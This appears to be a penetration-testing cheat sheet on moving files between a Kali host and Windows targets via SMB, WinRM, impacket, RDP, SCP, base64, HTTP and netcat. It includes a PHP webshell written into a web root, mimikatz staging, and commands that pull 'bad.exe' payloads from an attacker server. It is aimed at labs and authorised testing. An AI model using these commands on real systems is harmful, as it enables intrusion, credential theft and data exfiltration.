# File Transfer Tricks (Windows - Kali Linux) Whether you are solving a machine/lab, or engaging in a penetration testing assessment there will be times where you are required to transfer a file, it can be from your host to the target's host (windows/linux) or vice versa. Here I share a few tricks on how you can transfer files from Windows Machine to your Kali host. ## Using SMB With [impacket](https://www.kali.org/tools/impacket/) we can use the utility `impacket-smbserver` to start an SMB server and use it to transfer files from windows. #### On Kali Host ```shell impacket-smbserver test . -smb2support -username jojomojo -password jojomojo ``` #### On Windows ```powershell= net use m: \\YOUR_KALI_IP\test /user:jojomojo jojomojo copy backup.zip m:\ ``` >*Replace `YOUR_KALI_IP` with your Kali Linux host's IP.* ## Using Evil-WinRM Evil-WinRM has built-in commands known as `upload` and `download` which can be used to upload and download files respectively. #### Uploading Files To Windows ```shell= upload /path/to/sourcefile C:\path\to\destinationfile upload /home/kali/Desktop/chisel.exe C:\Users\testuser\chisel.exe ``` #### Downloading Files From Windows ```shell= download C:\path\to\sourcefile /path/to/destinationfile download C:\Users\testuser\Desktop\backup.zip /home/kali/Desktop/backup.zip ``` ## Using Impacket Utilities Some of the impacket utilities such as `impacket-psexec`, `impacket-wmiexec`, `impacket-smbexec` have built-in commands such as `lput` and `lget` that can be used to upload and download a file. #### Uploading A File To Windows > A file that is uploaded with this command, will be uploaded to the **C:\Windows\** directory. ```powershell= C:\Windows\system32> lput mimikatz.exe [*] Uploading mimikatz.exe to ADMIN$\/ C:\Windows\system32> cd C:\windows C:\Windows> dir /b mimikatz.exe mimikatz.exe ``` #### Downloading A File From Windows ```powershell= C:\Windows> lget mimikatz.log [*] Downloading ADMIN$\mimikatz.log ``` ## Using RDP If the windows machine has a RDP port open, we can mount shared folders and copy files. #### On Kali Host ```shell rdesktop -z -P -x m -u jojomojo -p lab 192.168.1.120 -r disk:test=/path/to/your/shared/dir ``` #### On Windows ```powershell copy mimikatz.log \\tsclient\test\mimikatz.log ``` ## Using SSH (SCP) SCP can be useful especially when transferring large files. #### Uploading A File To Windows ```shell scp /home/kali/Desktop/bad.exe Administrator@192.168.1.102:'C:\Users\Administrator\Documents\good.exe' ``` #### Downloading A File From Windows ```shell scp Administrator@192.168.1.102:'C:\Users\Administrator\Documents\important_file.zip' /home/kali/Documents/ ``` ## Using Base64 Base64 encoding/decoding can be used as a way to transfer files from/to windows. #### Transferring File From Kali Linux To Windows ###### On Kali Host Contents of webshell.php ```php └─$ cat webshell.php <?php echo shell_exec($_GET['cmd']); ?> ``` Encoding the content of webshell.php, you can use either one of these commands to encode the webshell to base64, then copy the output. ```shell= └─$ base64 -w0 <<< cat webshell.php └─$ cat webshell.php | base64 -w0 # output PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg== ``` ###### On Windows (Powershell) ```powershell PS C:\Users\jojomojo\Documents> [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg==')) > C:\inetpub\wwwroot\shell.php ``` ###### On Windows (certutil.exe) ```powershell= C:\Users\jojomojo\Documents> echo PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg== > enc C:\Users\jojomojo\Documents> certutil -decode .\enc C:\inetpub\wwwroot\shell.php ``` ## Using HTTP #### On Kali Host Run any of the commands below to start a HTTP webserver ```shell= python3 -m http.server 80 python2 -m SimpleHTTPServer 80 ``` #### On Windows ###### With certutil.exe ```powershell! certutil.exe -urlcache -f http://192.168.1.120/test.exe bad.exe ``` ###### With curl.exe ```powershell! curl -s -O http://192.168.1.102/test.exe ``` ###### With wget.exe ```powershell! wget -o bad.exe http://192.168.1.102/test.exe ``` ###### With iwr Powershell ```powershell= Invoke-WebRequest -Uri "https://192.168.1.102/test.exe" -OutFile "C:\Downloads\bad.exe" iwr http://192.168.1.102/test.exe -OutFile "C:\Downloads\bad.exe" ``` ## Using Netcat (nc) #### On kali host ```shell! nc 10.1.1.17 443 < /home/kali/Desktop/bad.exe ``` #### On Windows ```powershell! C:\Users\jojomojo\Test> nc.exe -l -p 443 > C:\Users\jojomojo\Documents\serviceRun.exe ``` Although there are more methods/techniques used to transfer files, the few mentioned above are most used methods in common pentesting scenarios allowing you to easily transfer files from windows to your kali linux host.